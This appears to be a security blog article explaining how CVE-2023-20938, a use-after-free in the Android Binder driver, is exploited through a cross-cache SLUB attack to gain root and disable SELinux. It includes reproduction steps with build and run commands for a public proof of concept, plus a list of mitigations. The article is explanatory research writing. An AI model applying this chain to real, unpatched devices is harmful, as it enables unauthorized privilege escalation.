Listen to this Post
Introduction:
The Linux kernel’s SLUB allocator is designed for performance and security, but it also creates a unique challenge for exploit developers. When a use-after-free (UAF) vulnerability occurs, the freed object and the target object you wish to corrupt often reside in different dedicated caches, making traditional reclamation techniques ineffective. This necessitates a sophisticated “cross-cache” attack, a technique that forces the kernel’s memory allocator to return a page from one cache to the buddy allocator, only to have it reallocated for a different, high-value object type. This article provides a deep dive into CVE-2023-20938, a local privilege escalation (LPE) vulnerability in the Android Binder driver, exploring the intricacies of the cross-cache attack and how Google’s Android Red Team successfully weaponized it.
Learning Objectives:
- Understand the root cause of CVE-2023-20938 and how improper input validation in the Binder driver leads to a use-after-free condition.
- Comprehend the mechanics of a cross-cache attack, including how an attacker can exhaust a SLUB cache and manipulate the buddy allocator.
- Analyze the step-by-step exploitation chain, from achieving a leak primitive to escalating privileges and disabling SELinux.
You Should Know:
1. The Vulnerability: A Binder Transaction Gone Wrong
The bug resides in the `binder_transaction_buffer_release()` function within the Android Binder driver (drivers/android/binder.c). The vulnerability is triggered by a maliciously crafted Binder transaction. By sending a transaction with an `offsets_size` that is one byte short of a full entry (sizeof(offset) - 1 == 7), the release path mis-parses a trailing flat_binder_object. This miscalculation causes the function to over-decrement the reference count of a `binder_node` object. As a result, the object is freed while a dangling reference to it remains live within the kernel, creating a classic use-after-free condition. This vulnerability affected all Android devices using GKI kernel versions 5.4 and 5.10.
2. The Cross-Cache Attack: Bypassing the SLUB Allocator
Unlike userspace heap allocators which use a common freelist, the Linux kernel’s SLUB allocator uses dedicated caches (kmem_cache) for different object types. The freed `binder_node` resides in the `kmalloc-128` cache, while the attacker’s desired target for corruption—such as a `struct file` or epitem—is allocated from a different cache.
To bridge this gap, the exploit employs a cross-cache attack. The steps are as follows:
1. Free the Vulnerable Object: The UAF is triggered, freeing the `binder_node` from the `kmalloc-128` cache.
2. Exhaust the Cache: The attacker performs a “heap spray” to allocate and free numerous objects in the same `kmalloc-128` cache. This forces the SLUB allocator to exhaust its supply of free objects and return the page containing the freed `binder_node` back to the global buddy allocator.
3. Reallocate the Page: The attacker then races to allocate objects from a different cache (e.g., the `eventpoll_epi` cache for `epitem` objects, which are 0x80 bytes). The buddy allocator may grant the same physical page that was just returned, effectively overlaying the new `epitem` object on top of the freed binder_node‘s memory.
Now, the dangling pointer to the freed `binder_node` and the newly allocated `epitem` share the same physical memory. The attacker can read from or write to the `epitem` through the UAF pointer, corrupting its data.
- Building the Exploit Chain: From Leak to Root
The public proof-of-concept for CVE-2023-20938 chains several primitives to achieve root privileges.
- Leak Primitive: By re-triggering the UAF and overlaying an `epitem` on the freed
binder_node, the exploit can read kernel pointers from the `epitem` structure. This leaks the address of a `struct file` and the `epitem` itself, effectively defeating Kernel Address Space Layout Randomization (KASLR). -
Arbitrary Read: The exploit uses the leaked addresses to craft a fake
binder_node. Re-triggering the UAF with this fake node allows the attacker to manipulate the kernel’s `hlist_del` unlink operation into performing a controlled write ((where) = what). This write is used to redirect a victim `file` object’s `f_inode` pointer to a fake inode overlaid on theepitem. Subsequently, an `ioctl` call with the `FIGETBSZ` command will read from this fake inode, providing a steerable 4-byte arbitrary read primitive. -
Privilege Escalation: With arbitrary read and write primitives, the exploit walks the kernel’s task list from the `init_task` to find the attacker’s process credentials (
struct cred). It then zeroes out the UID and GID values, granting root privileges. Finally, it locates and zeroes out the `selinux_state.enforcing` flag, dropping SELinux to permissive mode, and spawns a root shell.
4. Step-by-Step Guide: Reproducing the Exploit
For educational purposes, the exploit can be reproduced on a vulnerable Android emulator. This must only be performed in an isolated, authorized test environment.
1. Setup: Obtain a vulnerable Android Cuttlefish (AVD) image with kernel version 5.10.107.
2. Build: Compile the proof-of-concept exploit (poc_cf.c) using clang -static -Wall -Wextra -o poc_cf poc_cf.c -lpthread.
3. Deploy: Push the compiled binary to the emulator using adb push poc_cf /data/local/tmp/.
4. Execute: Run the exploit from an unprivileged shell: adb shell /data/local/tmp/poc_cf. A successful run will result in a root shell.
5. Mitigations and Defense in Depth
Modern Android kernels incorporate several mitigations to make cross-cache attacks more difficult. These include:
– CONFIG_SLAB_FREELIST_HARDENED: Hardens the slab freelist metadata to prevent certain corruption techniques.
– CONFIG_SLAB_FREELIST_RANDOM: Randomizes the freelist order to make heap layout more unpredictable.
– SLAB_ACCOUNT: Marks certain caches (like epitem) as accounted, making them harder to use in cross-cache attacks due to different allocation paths.
– Patch for CVE-2023-20938: The vulnerability was patched by Google in the February 2023 and July 2023 Android Security Bulletins.
6. Commands and Code Snippets
- Trigger the UAF (Conceptual): Sending a malicious Binder transaction with an `offsets_size` of 7.
- Heap Spray (Conceptual): Opening many Binder nodes and file descriptors to exhaust the `kmalloc-128` cache.
- Build Command: `clang -static -Wall -Wextra -o poc_cf poc_cf.c -lpthread`
– Run Command: `adb shell /data/local/tmp/poc_cf`
What Undercode Say:
- Key Takeaway 1: CVE-2023-20938 is an exemplary case study demonstrating that modern kernel exploitation is not just about finding a bug, but about mastering the intricacies of the memory allocator and the kernel’s internal structures to build a reliable exploit chain.
- Key Takeaway 2: The cross-cache attack is a powerful technique that effectively bypasses the isolation provided by the SLUB allocator, allowing an attacker to turn a limited UAF in one cache into a full LPE.
- Analysis: The exploit’s complexity highlights the importance of a deep understanding of kernel internals, including the Binder driver, SLUB allocator, and various mitigation techniques. The Android Red Team’s decision to publish the full chain, including the cross-cache primitive and heap shaping techniques, is a significant contribution to the security community. It provides a rare, end-to-end view of how advanced exploitation techniques are applied in the real world, constrained by KASLR, SLUB hardening, and per-CPU partial lists. This transparency empowers researchers and defenders alike to better understand and mitigate such threats. The existence of public proof-of-concept code further underscores the critical need for timely patching.
Prediction:
- -1: The sophistication of cross-cache attacks will continue to evolve, with researchers developing new techniques like SLUBStick to achieve over 99% success rates on generic caches, further challenging current mitigations.
- -1: As Android devices become more prevalent in enterprise and critical infrastructure, the impact of such LPE vulnerabilities will grow, making them a prime target for advanced persistent threat (APT) groups and commercial surveillance vendors.
- +1: The security community’s proactive approach, including detailed disclosures from Google’s Android Red Team and the availability of proof-of-concept exploits for research, will accelerate the development of more robust kernel hardening and detection mechanisms, ultimately making the Android ecosystem more resilient.
▶️ Related Video (90% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Pallis Been – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
